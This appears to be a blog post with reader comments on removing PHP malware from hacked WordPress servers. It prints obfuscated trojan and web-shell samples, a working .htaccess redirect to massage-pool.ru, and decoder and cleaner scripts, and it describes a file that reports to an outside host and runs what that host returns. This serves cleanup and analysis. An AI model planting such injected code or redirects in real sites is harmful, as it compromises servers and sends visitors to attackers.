Our server was hacked and all PHP files were infected. Each infected PHP file had malicious code / malware injected into it (samples below); the code calls another PHP file and runs its program. To clean the files I had to remove the malicious code from every single file, which is really frustrating when you have hundreds of infected files, so I created a script that does it automatically.
List of Malicious Code / Malware Script that I have encountered so far:
A. c99madshell – this type of malware script gives the attacker admin-like access: it can view your database and read your files. Below is the sample code:
<?php $md5 = "2b351068f6742153073f3af2e7fa11de"; $wp_salt = array('6',"r",')',"f",'i','4',"z",'_','(','e',";","g","o",'b',"a","$","v","d","t",'n','c',"l","s"); $wp_add_filter = create_function('$'.'v',$wp_salt[9].$wp_salt[16].$wp_salt[14].$wp_salt[21].$wp_salt[8].$wp_salt[11].$wp_salt[6].$wp_salt[4].$wp_salt[19].$wp_salt[3].$wp_salt[21].$wp_salt[14].$wp_salt[18].$wp_salt[9].$wp_salt[8].$wp_salt[13].$wp_salt[14].$wp_salt[22].$wp_salt[9].$wp_salt[0].$wp_salt[5].$wp_salt[7].$wp_salt[17].$wp_salt[9].$wp_salt[20].$wp_salt[12].$wp_salt[17].$wp_salt[9].$wp_salt[8].$wp_salt[15].$wp_salt[16].$wp_salt[2].$wp_salt[2].$wp_salt[2].$wp_salt[10]); $wp_add_filter('FZnHEqvGFkU/x3YxIKdyeUDOGZEmr8gZRA5f/3SH0gS6+/...'); ?>
B. Trojan
<?php ... eval(base64_decode("...")); ...
C. Trojan
<?php if(!function_exists('b4xvpqj38lpm8ux')){function b4xvpqj38lpm8ux($almi){$ddhg='mi=';$obwyp2='ba';$tqmtyx='$a';$dl8u6='4';$ufhk7=';';$fead2i='l';$jqml='e';$gndg='c';$c8px1='al';$fnidfi='ode';$u5vntk='se6';$uhoe='($';$wucoiz='_d';$ebexu='mi)';eval($tqmtyx.$fead2i.$ddhg.$obwyp2.$u5vntk.$dl8u6.$wucoiz.$jqml.$gndg.$fnidfi.$uhoe.$c8px1.$ebexu.$ufhk7);return $almi;}$dn4b2l='...';eval(b4xvpqj38lpm8ux('JGRuNGIybD1iNHh2cHFqMzhscG04dXgoJGRuNGIybCk7JGRuNGIybD1zdHJ0cigkZG40YjJsLCdnKzQhdk9WdS9OYnc5V0Ege0hCNUU4PmpJaHRxb01zeENUbllfYXBRKDwuMm1SNzFKUyJacktYaWZsKXkKOmV9RDN8UDY9Y0wway0qR3pGLFVkJywn...'));}
D. Javascript Trojan
<script>if(window.document)aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){ss='';try{new location(12);}catch(qqq){...}ee='e';e=window.eval;t='y';}h=-4*Math.tan(Math.atan(0.5));n="3.5a3.5a51.5a50a15a19a49a54...".split("a");for(i=0;i-n.length
E. htaccess – The code below redirects your visitors to the hacker's site (massage-pool.ru)
<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*) RewriteRule ^(.*)$ http://massage-pool.ru/mysave/index.php [R=301,L] RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*) RewriteRule ^(.*)$ http://massage-pool.ru/mysave/index.php [R=301,L] </IfModule> ErrorDocument 400 http://massage-pool.ru/mysave/index.php ErrorDocument 401 http://massage-pool.ru/mysave/index.php ErrorDocument 403 http://massage-pool.ru/mysave/index.php 
ErrorDocument 404 http://massage-pool.ru/mysave/index.php ErrorDocument 500 http://massage-pool.ru/mysave/index.php
F. Timthumb Vulnerability
This script is used to crop and resize images and ships with most premium WordPress themes. Hackers found a vulnerability in the script that lets them do whatever they want: with its help they can access your database to get sensitive information, insert malicious code into all of your PHP files, create further malicious PHP scripts, and a lot more.
Any timthumb.php or thumb.php file below version 1.35 is vulnerable. I advise updating the file to version 2.0 or later.
Solution: update your file from here: http://timthumb.googlecode.com/svn/trunk/timthumb.php
G. class-wheel.php
As far as I decoded the file, the script sends important information about your server to thebestcache.com, then fetches data from that server and executes it. I think with this script the hacker can do whatever they want to your server, just like with timthumb: write RewriteRule entries in your .htaccess to redirect users to the hacker's site, insert malicious iframes, insert malicious JavaScript, and a lot more.
Solution: delete this file immediately.
Below is a snippet of the script:
<? $GLOBALS['_1739858145_']=Array('e' .'rror' .'_' .'r' .'eporting','' .'in' .'i_' .'se' .'t','in' .'i_set','' .'soc' .'k' .'et_' .'get' .'peerna' .'m' .'e','s' .'trto' .'k','strpbrk','session_' .'i' .'s_reg' .'ist' .'ered','preg_replace','ima' .'gecre' .'at' .'efro' .'mg' .'i' .'f','ar' .'ray_pop','implode','preg_mat' .'ch','i' .'m' .'pl' .'ode','preg_ma' .'t' .'ch','str' .'ripos','fl' .'o' .'ck','array_f' .'lip','mt_rand','p' .'reg_' .'match','p' .'reg_mat' .'ch','im' .'pl' .'o' .'de','p' .'reg_' .'m' .'a' .'tch','' .'b' .'as' .'e64_encode','ser' .'ialize','fi' .'l' .'e' .'_get' .'_c' .'ontents','b' .'ase64_d' .'ecode','preg_m' .'atch','' .'pre' .'g_rep' .'la' .'ce','' .'preg_replace','u' .'nse' .'ri' .'alize','base64' .'_d' .'e' ...
H. god_mode_on
<?php /*god_mode_on*/eval(base64_decode("ZXZhbChiYXNl...")); /*god_mode_off*/ ?><?php /*f2c315e178b39d12fa925987425e4e25_on*/ $Py0IAoRh= array('10100','10117','10096','10107');$VMteSwXRc7lP= array('4892','4907','4894','4890','4909','4894','4888','4895','4910','4903','4892','4909','4898','4904','4903');$xvak07gN5kcVT= array('6294','6293','6311','6297','6250','6248','6291','6296','6297','6295','6307','6296','6297');$YMBF7WGci7Z07sbiK1DbxiRKDEF4gdT8PkEN6aPf8F66X="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTm...";if (!function_exists("TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5")){ function TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($MxwA7W2O5hdqavGiLlWRsjFStqs84USMiedg16,$bdXddjKlUV8Cdh7WBoeziZiV7nZeeVY1YL51UFdFr){$Puj6hKkmatbif9v4dAP2sDDnvoTyUazSvJOCkZOkjQtoPPiTg = '';foreach($MxwA7W2O5hdqavGiLlWRsjFStqs84USMiedg16 as $QyrfMMuvbewBXSaCkksZvBGOPmuX5ALH){$Puj6hKkmatbif9v4dAP2sDDnvoTyUazSvJOCkZOkjQtoPPiTg .= chr($QyrfMMuvbewBXSaCkksZvBGOPmuX5ALH - $bdXddjKlUV8Cdh7WBoeziZiV7nZeeVY1YL51UFdFr);}return $Puj6hKkmatbif9v4dAP2sDDnvoTyUazSvJOCkZOkjQtoPPiTg;}$zs4ALsgC4dMC1kTLd = TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($Py0IAoRh,9999);$G2dp21boYT5TLmcF = TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($VMteSwXRc7lP,4793);$JYTgSWSlO34p7zE0CUStV6iE22ff5LSJAB = TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($xvak07gN5kcVT,6196);$eozu2spipON = $G2dp21boYT5TLmcF('$MxYAjVJONC',$zs4ALsgC4dMC1kTLd.'('.$JYTgSWSlO34p7zE0CUStV6iE22ff5LSJAB.'($MxYAjVJONC));');$eozu2spipON($YMBF7WGci7Z07sbiK1DbxiRKDEF4gdT8PkEN6aPf8F66X);} /*f2c315e178b39d12fa925987425e4e25_off*/ ?>
I. Trojan
<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1Uj...";$eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65";$eva1tYldakBcVSir = "\x73\164\x72\162\x65\166";$eva1tYldakBoVS1r = "\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160";$eva1tYidokBoVSjr = "\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\xp76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\xp76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145";$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>
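The samples above share one shape: a base64 blob (sometimes deflate-compressed as well) handed to eval(), often several layers deep. The Python script below is an added example, not part of this post or of the cleaner script: it peels those layers statically with base64 and zlib instead of executing anything, so the final payload can be read safely. The sample it decodes is constructed inline from a harmless echo statement wrapped twice; the regex and the function names are my own. Families that use other wrappers (str_rot13, gzuncompress, the character-array tricks in samples A, C and H) are not handled by this pattern.

```python
import base64
import re
import zlib

# Constructed sample (not a real infection): a harmless inner statement wrapped as
# eval(gzinflate(base64_decode('...'))) inside eval(base64_decode("...")).
_INNER = 'echo "hello from the innermost layer";'


def gzdeflate_b64(src: str) -> str:
    """PHP gzdeflate() output is raw DEFLATE (no zlib header); base64 it like the samples."""
    co = zlib.compressobj(9, zlib.DEFLATED, -15)
    raw = co.compress(src.encode()) + co.flush()
    return base64.b64encode(raw).decode()


SAMPLE = 'eval(base64_decode("%s"));' % base64.b64encode(
    ("eval(gzinflate(base64_decode('%s')));" % gzdeflate_b64(_INNER)).encode()
).decode()

# One layer: eval( [gzinflate(] base64_decode( <quoted base64 literal> ) [)] );
# The blob is restricted to the base64 alphabet so the match cannot run past the
# closing quote into unrelated code.
LAYER_RE = re.compile(
    r"""eval\s*\(\s*(?P<inflate>gzinflate\s*\(\s*)?base64_decode\s*\(\s*(['"])"""
    r"""(?P<b64>[A-Za-z0-9+/=\s]+)\2\s*\)\s*(?(inflate)\)\s*)\)\s*;?""",
    re.S,
)


def peel_layer(src: str):
    """Return the decoded text of the first eval(...base64_decode(...)) layer, or None."""
    m = LAYER_RE.search(src)
    if not m:
        return None
    data = base64.b64decode(re.sub(r"\s+", "", m.group("b64")))
    if m.group("inflate"):
        data = zlib.decompress(data, -15)  # wbits=-15: raw DEFLATE, i.e. PHP gzinflate()
    return data.decode("utf-8", "replace")


def unwrap(src: str, max_layers: int = 20):
    """Peel layers until plain code remains; returns every intermediate layer in order."""
    layers = []
    cur = src
    for _ in range(max_layers):  # hard cap so a self-referential blob cannot loop forever
        nxt = peel_layer(cur)
        if nxt is None:
            break
        layers.append(nxt)
        cur = nxt
    return layers


if __name__ == "__main__":
    for depth, text in enumerate(unwrap(SAMPLE), 1):
        print("--- layer %d ---" % depth)
        print(text)
```

Run it against a real infected file by reading the file's contents into `src` and calling `unwrap(src)`; the last element of the returned list is the innermost code, which is what you want to read before deciding how to clean.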
Most of these attacks happen when you run old versions of your programs – WordPress, Joomla, Timthumb, WP plugins – or use easy FTP or SFTP passwords; an infected computer can use your FTP credentials as well. Make sure you have updated versions of your programs.
Download and Install
Download the cleaner script below and put it in your root directory or any other directory. The program checks all PHP files and cleans each one that is infected with the malware code above.
Malware code keeps on coming back
If you removed the malware code / malicious script successfully but it keeps coming back, I suggest running the malware scanner: http://www.php-beginners.com/wordpress-hack-malware-scanner.html and sending the scan result to info@php-beginners.com; we need to find the file that causes the malware code / malicious script to come back.
You can download two types of cleaner script:
a web browser version and a shell access version. You can use either of the two.
- Download Cleaner 2.9 HTTP Version below and run it on your favorite browser.
Example: http://www.yoursite.com/cleaner_2.9.php
- Download Cleaner CLI 2.9 Version below and run it using terminal or command line.
Example: $ time php cleaner-cli_2.9.php 2>&1 >> cleaner_log
The command above will run the cleaner-cli_2.9.php script and log the output to cleaner_log file.
Note:
Please don't forget to create a backup of your WordPress files, or of the /wp-content/ directory only. Use shell access to back up the files because it is fast and easy.
You can do it like this: $ tar -cvzf [output_directory.tar.gz] [directory]
[~/wordpress-directory]# tar -cvzf wp-backup-content-only.tar.gz ./wp-content
or
[~/wordpress-directory]# tar -cvzf wp-backup-all.tar.gz ./
This malware cleaner script works on all PHP programs; you can run it even on non-WordPress sites, but please create a backup of your files before you run the cleaner script, just to make sure you can recover them easily.
If you experience any malware / malicious program that I don't know about, please let me know so that I can add it to the program. Thanks.
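As an added example (not the cleaner script from this post, whose source is not reproduced here), the Python script below performs the workflow the post describes: take a tar.gz backup first, walk every sub-directory for .php files, and strip the injected eval(base64_decode("...")); statement (samples B and I above). It defaults to a dry run that only reports which files would change; pass --apply to write. The constructed strings in the test and the function names are my own. The regex restricts the blob to the base64 alphabet so it cannot run past the closing quote into legitimate code, and an empty <?php ?> block left behind by the removal is collapsed so the file keeps parsing.

```python
import os
import re
import tarfile
import time

# The injected statement: eval(base64_decode(<quoted base64 literal>));
# Any whitespace (the "two tabs and a space" variant) before it is tolerated by search().
EVAL_B64_RE = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*(['"])[A-Za-z0-9+/=\s]*\1\s*\)\s*\)\s*;?"""
)
# A "<?php ?>" block that is empty after the removal is harmless but untidy; drop it.
EMPTY_BLOCK_RE = re.compile(r"<\?php\s*\?>")


def clean_source(src: str):
    """Return (cleaned_text, number_of_removed_statements) for one file's contents."""
    cleaned, n = EVAL_B64_RE.subn("", src)
    if n:
        cleaned = EMPTY_BLOCK_RE.sub("", cleaned)
    return cleaned, n


def backup_tree(root: str, dest_dir: str = None) -> str:
    """Write <root> to a timestamped tar.gz next to it (the post's 'tar -cvzf' step)."""
    root = os.path.abspath(root)
    dest_dir = dest_dir or os.path.dirname(root)
    name = os.path.join(dest_dir, "backup-%s.tar.gz" % time.strftime("%Y%m%d-%H%M%S"))
    with tarfile.open(name, "w:gz") as tar:
        tar.add(root, arcname=os.path.basename(root))
    return name


def clean_tree(root: str, dry_run: bool = True) -> dict:
    """Walk root recursively; return {path: removed_count} for every .php file that matched."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.endswith(".php"):
                continue
            path = os.path.join(dirpath, fn)
            # surrogateescape round-trips non-UTF-8 bytes unchanged on write
            with open(path, "r", encoding="utf-8", errors="surrogateescape") as fh:
                src = fh.read()
            cleaned, n = clean_source(src)
            if n:
                report[path] = n
                if not dry_run:
                    with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                        fh.write(cleaned)
    return report


if __name__ == "__main__":
    import sys
    args = [a for a in sys.argv[1:] if not a.startswith("--")]
    target = args[0] if args else "."
    apply = "--apply" in sys.argv
    if apply:
        print("backup written to", backup_tree(target))
    for path, hits in sorted(clean_tree(target, dry_run=not apply).items()):
        print("%s: %d injected statement(s)%s" % (path, hits, "" if apply else " (dry run)"))
```

Usage: `python cleaner_example.py /path/to/site` lists affected files without touching them; `python cleaner_example.py /path/to/site --apply` backs up first, then rewrites. Files the regex did not match are never rewritten, so a clean site comes back with an empty report.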
Malware Cleaner
Really great creation for WordPress Malware Script Attack Fix.
Wow amazing nice! it worked!
Hi, does anyone know specifically what flaw created this issue? Was it definitely Word Press, if so does anyone have a permanent fix? Also, does anyone know what this script specifically does aside from injecting the malicious code in other script. To me, it appears it also captures credentials and/or attempts other hacks. I haven’t looked at all the code, but I’m hoping someone as more information on this.
The script works by recursively evaluating a piece of code that is encoded & inflated. For assistance, I've created a helper function which, when given the string passed to wp_add_filter, will decode the string and display the final readable PHP that is ultimately evaluated:
function resolve($str) {
    while (true) {
        // each layer is base64 of a deflated string
        $str = gzinflate(base64_decode($str));
        // stop once the decoded text is no longer another eval(...) wrapper
        if (substr($str, 0, 4) != "eval") break;
        print $str;
        print "";
        // pull the quoted payload out of the eval('...') call and go one level deeper
        $pos = strpos($str, "'") + 1;
        $rpos = strrpos($str, "'");
        $str = substr($str, $pos, $rpos - $pos);
    }
    print $str;
}
As the author stated, the above runs another PHP script hidden in a random folder, which is much larger and includes most of the malicious code that not only injects itself into other scripts but appears to collect credentials, access other URLs, run brute force, etc. I've not analyzed this larger code, but if someone has additional information, it would be helpful to prevent this in the future.
Thanks!
Hello Graeme,
You can try this script to decrypt the code:
<?php
header("Content-type:text/plain");
// paste the base64 blob from your infected file here
$malwareCode = gzinflate(base64_decode("FZnFDuvWAkU/p608MJOqDs.........................."));

function malDecrypt($m) {
    // keep unwrapping while the decoded text is another eval(gzinflate(...)) layer
    if (preg_match("/^eval\(gzinflate/", $m)) {
        eval(str_replace("eval", "\$m=", $m));
        return malDecrypt($m);
    } else {
        return $m;
    }
}

echo malDecrypt($malwareCode);
Run this with your $malwareCode; make sure you replace the malware code. With my situation, the malware script looks like this:
if (function_exists('ob_start') && !isset($GLOBALS['mfsn'])) {
    $GLOBALS['mfsn'] = '/home3/hmjohnco/public_html/whatscrapandwhatsnot/cgi-bin/255.php';
    if (file_exists($GLOBALS['mfsn'])) {
        include_once($GLOBALS['mfsn']);
        if (function_exists('gml') && function_exists('dgobh')) {
            ob_start('dgobh');
        }
    }
}
I didn't really get into the details of the code. What I did is delete the file it is calling. If you have enough time you can try to decrypt the file and share with us what you've found. I think it's interesting.
I think the attack happened because we are using shared server. I don’t think it’s in wordpress, but I’m not really sure about that.
These hackers are really good because sometimes I have a hard time entering the FTP because I forgot my password, but they (the hackers) can easily go in and inject all those files. Amazing.
Anyway, thanks for sharing Graeme. Hope they’ll stop bugging us, because they really cost a lot of time.
Thanks Graeme
Many thanks guys!!! My site got infected today and I was able to fix the mess using your cleaner.php file (for which you’ll immediately receive a post in my blog – that’s the least I can do…). I think they’ve got through a WordPress vulnerability. What the virus appears to be doing is add spam links to the body of your pages. It seems it’s not doing anything else than that, although I wasn’t able to decrypt it all, so this is as far as I got… It’s still a mystery to me how they got in though, so even with the virus currently removed, I’m afraid it may happen again… Any advice?
Thank you Marin for sharing.
That's what the usual malware does: it inserts a bunch of code, spam links and iframes on your home page and subpages. Yeah! It's still a mystery; only the masters know. Actually, I'd like to know that too (how they hack), so that I can defend my server somehow. But anyway, thanks Marin for your feedback. I'm happy that my little script helped you with your malware issue.
If you guys have any problem on different malware attack, let me know. I’ll try to update my cleaner.php script so that it can clean other malware attacks, or if you have time you can modify it and improve. Thanks.
At this point, I have the virus decrypted (about 4000 lines of code) Anyone willing to help with this? (reading and understanding it)
My advice so far is, disable the following functions from your php.ini:
disable_functions = create_function,gzinflate,eval,base64_decode
That’s good… hmmmm… Can I view it? Just give me a link.
I'm not really sure that disabling gzinflate, eval, and especially base64_decode is a good idea.
Hope you don't consider this as spam, but here's all the info: http://www.marinbezhanov.com/web-development/6/malware-alert-september-2011-sshell-v.1.0/
seems a really 0day VIrus…
there is no forums or mailiing list about this virus
yes, what would be the countermeasures for this new virus/malware ?
disabling those functions that Marin mentioned wouldnt be good because Word press uses those functions i believe….
Regards,
You’re right Poncho. WordPress uses all of these functions… I’m wondering if someone on the WordPress support forum will have any further ideas on this. Although I decoded 3 of the virus files I found, I’m almost sure I’m missing something… Has someone had a chance to look at the code I decrypted? Any luck in understanding it fully? I’m pasting the links here quickly, so that you don’t have to read the whole article on my blog:
Malicious Code injected in every PHP file: http://pastebin.com/Wv9eqi7J (where “/home/marinbez/public_html/mediashare/cgi-bin/1bf.php” is the path to an include file containing more malicious code)
1bf.php’s code (the filename is randomly generated): http://pastebin.com/SGJ74C6Y
wp-thumb-creator.php’s code: http://pastebin.com/9gP3vgyH (looks like that’s one of the main virus files, but not the only one. it’s the one responsible for the PHP injection)
SSHell v.1.0′s code: http://pastebin.com/1qS8CyCF (that shell file is usually located in the same folder as the others. it’s the file that allows the hackers to log into your server and cause trouble. I’ve intentionally commented out the authentication, so that you can see how it works, without having to type password)
Yes, Marin is correct
wp-thumb-creator.php( http://pastebin.com/9gP3vgyH ) is the one that injects malicious code all php files. This is also the main file of the hacker.Thank you Marin for pointing it out.
couple days without sleeping…was reinstalling all wp blogs, was thinking what to do and here it is, simple script ,that cleans these virus
I would like to ask how much of blogs it can scan ? because when I’m starting it, it stops after some time.
I fixed that problem by adding
ini_set(‘memory_limit’,’128M’);
Oh! Yeah! exactly you will specify the memory limit.
Sorry about that, I forgot to add that to the code. Thanks for letting me know about it. If possible, use the "cleaner-cli.php" and run it on the command line so you won't have a problem setting up the memory limit.
Basically, the script scans all PHP files, including PHP files in sub-directories, so if you put "cleaner-cli.php" in your root directory it eventually cleans everything, all PHP files down to the Nth sub-directory.
I also suggest running the Malware Scanner ( http://www.php-beginners.com/wordpress-hack-malware-scanner.html ) that I recently created. You can view other potential hacking codes, such as eval, c99madshell, and long_text. Again, I suggest running it on the command line. I might create an ajax version of the cleaner and scanner scripts someday, so they won't take much memory. I'll keep you all posted.
Anyway, if you find bugs and errors, please do let me know. Thanks.
Strange, but it is not finding the md5 code on subdomain blogs.
Can I see your file structure? It should be like this one:
Cleaner will try open all the sub-directories and check all PHP files.
The issue has been recently reported on the WordPress forums: http://wordpress.org/support/topic/warning-tinymce-exploit
Wow this is really helpful. Thanks again! Marin. Great job.
My site’s also been infected. I’m on a shared server and don’t have command-line access, so I uploaded cleaner.php to the root directory and ran it from a browser.
cleaner.php's output was a nested list of files and directories with this line above it:
Warning: set_time_limit() [function.set-time-limit]: Cannot set time limit in safe mode in /var/www/vhosts/else.dnserver.net.nz/httpdocs/cleaner.php on line 2
and the heading "Found Files" at the bottom.
Do I need to do anything further with this output, or has cleaner.php fully resolved everything?
After running cleaner.php I manually deleted the two obviously bogus files fingered by the anti-virus application as they weren’t listed in the above report.
Thanks,
::Leigh
Hello Leigh,
Sorry for the late reply. I hope you already fixed your site, in case if not I created cleaner version 2. You can download it above (post).
Please let me know if there still a problem. I’ll be happy to help you.
Thanks
Regards,
Paolo
Thank you for your great work! It helped me to fix that problem!
Hello admin,
my site was attacked with new malware… but your current script does not work bcz the command line is new… which is not found in my php…
every php file includes this command line in the header:
eval(base64_decode("…"));
can you tell me how to resolve it?
Thanks advance
i have just changed your $find code with the line below
$find = "\s*eval\s*\([^\)]+\)\)\;";
then run this script…
wow it’s work with me… but i am afraid bcz i’m not good in php… so @Paolo if you make sure in this code no wrong then it would be greats… waiting for your replay…
Thanks for create great scripts…
Hi Ishtiyak,
Nice, yes, the script is pretty clean and safe, there’s nothing wrong about it.
I'm not really sure why you replaced the $find value with "…eval\s*…"; that means
you'll remove all "eval(.*)" calls in your php files?
If that’s safe with your program, then we don’t have problem.
Oh! Sorry I didn’t noticed this first comment.
You can try this one:
$find = "<\?php\s*eval\(\s*base64_decode\s*\(.*\)\s*);";
Test this one first on single file then run it on all of your
files if it’s working fine. See structure below, on how to test on
one file:
/www/…/test/cleaner_2.0.php
/www/…/test/infected-php-file.php
Let me know.
Thanks so much for you reply…
this code does not work for me
$find = "<\?php\s*eval\(\s*base64_decode\s*\(.*\)\s*);";
the error is this:
Warning: preg_match() [function.preg-match]: Compilation failed: unmatched parentheses at offset 43 in /***/**/cleaner2.php on line 161
if at first we target '<?php eval' is it replace all '<?php' where it has 'eval' right?
why i asking about <?php replacing bcz it infected like this type…
<div id="post-">
it’s effected on every php starting code… also 2 tab 1 space then start eval()… so if php remove the whole site not working….
I know it pretty danger for bcz i target all eval() function… but when i try to add base64_decode() for safety then it same error show…
P.S: $find = "\s*eval\s*\([^\)]+\)\)\;"; this pretty dangerous code works with all my sites… (joomla, wordpress, magento+custom php) now they are fresh… bcz till now no error shows on the sites…
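The exchange above turns on how the $find pattern is written. The Python snippet below is an added example, not code from the post or from its cleaner script: it compiles the two patterns quoted in this thread (the broad one, and the one whose unescaped ')' before ';' fails to compile, in Python's re just as in PCRE), plus a narrower alternative of my own, and runs each against a few constructed lines: two injected variants and several legitimate uses of eval() and base64_decode(), one of them the eval(str_replace(...)) line from the decoder posted earlier in this thread. It counts detections and false positives for each pattern.

```python
import re

# Constructed test lines (not from a real site).
INFECTED = [
    'eval(base64_decode("ZWNobyAiaGkiOw=="));',                # base64 of: echo "hi";
    "\t\t eval(base64_decode('ZWNobyAiaGkiOw=='));",           # two tabs and a space first
]
LEGITIMATE = [
    '$result = eval("return " . $expr . ";");',               # eval of a built expression
    "eval('?>' . $template);",                                 # template engine style
    '$data = unserialize(base64_decode($cookie));',            # base64 without eval
    'eval(str_replace("eval", "\\$m=", $m));',                 # the decoder helper above
]

# Broad pattern from the comment: any eval(...)) followed by ';'.
BROAD = r"\s*eval\s*\([^\)]+\)\)\;"
# Pattern from the reply, as written: the ')' before ';' is unescaped, so the
# engine reports an unbalanced parenthesis and refuses it.
UNESCAPED = r"<\?php\s*eval\(\s*base64_decode\s*\(.*\)\s*);"
# Narrow alternative: only eval(base64_decode(<quoted base64 literal>));
NARROW = r"""eval\s*\(\s*base64_decode\s*\(\s*(['"])[A-Za-z0-9+/=]+\1\s*\)\s*\)\s*;"""


def compiles(pattern: str) -> bool:
    """True if the pattern is accepted by the regex engine."""
    try:
        re.compile(pattern)
        return True
    except re.error:
        return False


def evaluate(pattern: str):
    """Return (injected lines detected, legitimate lines wrongly matched)."""
    rx = re.compile(pattern)
    detected = sum(1 for line in INFECTED if rx.search(line))
    false_positives = sum(1 for line in LEGITIMATE if rx.search(line))
    return detected, false_positives


if __name__ == "__main__":
    for name, pat in (("BROAD", BROAD), ("UNESCAPED", UNESCAPED), ("NARROW", NARROW)):
        if not compiles(pat):
            print("%-9s does not compile" % name)
            continue
        d, fp = evaluate(pat)
        print("%-9s detected %d/%d injected, %d/%d false positives"
              % (name, d, len(INFECTED), fp, len(LEGITIMATE)))
```

The broad pattern catches both injected lines but also strips the decoder's own eval(str_replace(...)) call, and would do the same to any application code ending in "));". Tying the match to base64_decode with a quoted literal in the base64 alphabet keeps the detection rate and drops the false positive, which is why testing on one file first, as suggested above, is worth the time.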
Thanks
Hi,
I am having the same exact problem as the poster above me with this code being injected to thousands of my files:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29..."));
Would you mind possibly updating your cleaner tool to fix this malware code? Or tell me how I can update the one you posted above so that it works correctly?
THANK YOU so much for your help. I’ve been dealing with this since October and am just getting this close!
Hello Saje,
Ok, can you please send and attach an infected file to me at info@php-beginners.com.
I’ll check the file and create a pattern. Thank you.
Paolo
I uploaded new version 2.1. This will now remove eval(base64_decode(*)); code. Please check it out.
Thanks.
First, I would like to thank Pablo, your cleaner.php script corrected most of the php files.
But I still have quite a few php files that have this kind of code –
<?php
if(!function_exists('.......................'))...
Is there any fix for that?
Thank You.
I forgot to mention that inside that code there are also a few –
eval(........random characters)..
Thanks.
Hello David,
I see, can you please send and attach 3 infected php files to info@php-beginners.com.
